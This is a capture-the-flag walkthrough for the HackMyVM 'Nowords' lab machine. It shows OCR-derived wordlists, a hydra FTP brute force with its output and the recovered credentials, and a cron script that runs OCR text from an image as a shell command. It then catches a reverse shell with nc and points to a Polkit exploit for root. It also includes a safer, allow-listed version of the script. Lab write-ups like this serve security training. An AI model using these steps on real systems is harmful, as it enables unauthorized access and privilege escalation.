HackMyVm Nowords Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Nowords
Below are the main steps.
Scan the ports with Nmap, enumerate port 80, and find a hint in index.html.
~ curl http://192.168.56.100/index.html
Hint inside.
<!-- [usernames and passwords are lowercase] -->
Download robots.txt; it is actually a PNG file with some strings in it.
[image-20210707134241221.png]
OCR the strings online, build a dictionary from them, and scan port 80 again with it: only one valid file turns up. Download it; it is actually a JPG file with some more strings.
[image-20210707134856042.png]
OCR again, lowercase the first character of each word, and build a dictionary. Then brute-force FTP with it.
~ hydra -L pass2.txt -P pass2.txt 192.168.56.100 -t 64 ftp -f
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-06 12:55:22
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 5776 login tries (l:76/p:76), ~91 tries per task
[DATA] attacking ftp://192.168.56.100:21/
[21][ftp] host: 192.168.56.100 login: sophie password: natalia
[STATUS] attack finished for 192.168.56.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-06 12:56:28
Through FTP, we can browse the whole filesystem. In /home/sophie, we find command.jpg and log.txt.
In /home/me, we find doit.py.
~ cat doit.py
#!/usr/bin/python3
# coding: utf-8
import pytesseract
import os
try:
    import Image, ImageOps, ImageEnhance, imread
except ImportError:
    from PIL import Image, ImageOps, ImageEnhance

def solve_captcha(path):
    # OCR the image and return the recognised text verbatim
    captcha = pytesseract.image_to_string(Image.open(path))
    return captcha

if __name__ == '__main__':
    text = solve_captcha("/home/sophie/command.jpg")
    a = text.split("\n")
    # the OCR result is written to a log that sophie can read over FTP
    f = open("/home/sophie/log.txt","w")
    f.write(" Executing: "+text)
    f.close()
    # the first OCR line goes straight to a shell: whatever is written
    # into command.jpg is executed by the user this cron job runs as
    os.system(a[0])
The script means that a cron job OCRs command.jpg and runs the first line of the recognised text as a shell command, so we only need to put a bash command in command.jpg.
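For comparison, an added example (not the machine's doit.py) of the same cron workflow with the OCR output treated as untrusted input: only a single allow-listed program name is accepted, and it is run without a shell. The OCR call is passed in as a function so this runs without pytesseract; ALLOWED_COMMANDS and the sample OCR strings are assumptions.

```python
import shlex
import subprocess
from typing import Callable, List, Optional, Tuple

# Assumed allow-list: the only programs the cron job may run (not from the page).
ALLOWED_COMMANDS = {"date", "uptime", "whoami"}


def parse_command(text: str) -> Optional[List[str]]:
    """Return argv for the first OCR line, or None if it must be refused.

    doit.py does os.system(a[0]) on this line; here it is split the way a
    shell would, and anything other than one bare allow-listed program is
    rejected, so 'uptime; cat /etc/shadow' never reaches a shell.
    """
    first_line = text.split("\n", 1)[0].strip()
    try:
        argv = shlex.split(first_line)
    except ValueError:  # unbalanced quotes in the OCR output
        return None
    if len(argv) != 1 or argv[0] not in ALLOWED_COMMANDS:
        return None
    return argv


def run_from_image(ocr: Callable[[str], str], path: str) -> Tuple[bool, str]:
    """OCR the image with the supplied function and run the result safely.

    `ocr` stands in for pytesseract.image_to_string so the example runs offline.
    Returns (executed, output_or_reason); refusals are worth logging and alerting on.
    """
    text = ocr(path)
    argv = parse_command(text)
    if argv is None:
        return False, "refused: " + repr(text.split("\n", 1)[0])
    # argv list with shell=False: no shell ever parses the OCR text
    result = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return True, result.stdout


# Constructed OCR results standing in for the contents of command.jpg.
BENIGN_OCR = "uptime\n"
INJECTED_OCR = "uptime; cat /etc/shadow\n"

if __name__ == "__main__":
    print(run_from_image(lambda _p: BENIGN_OCR, "/constructed/command.jpg"))
    print(run_from_image(lambda _p: INJECTED_OCR, "/constructed/command.jpg"))
```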
We put the shell command in command.jpg and upload it through FTP.
[image-20210707135227171.png]
Wait a minute and we get a reverse shell.
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49930.
bash: cannot set terminal process group (136083): Inappropriate ioctl for device
bash: no job control in this shell
sophie@nowords:~$
The root step uses the Ubuntu Polkit vulnerability.
The PoC is here:
https://github.com/Almorabea/Polkit-exploit
[image-20210707134038343.png]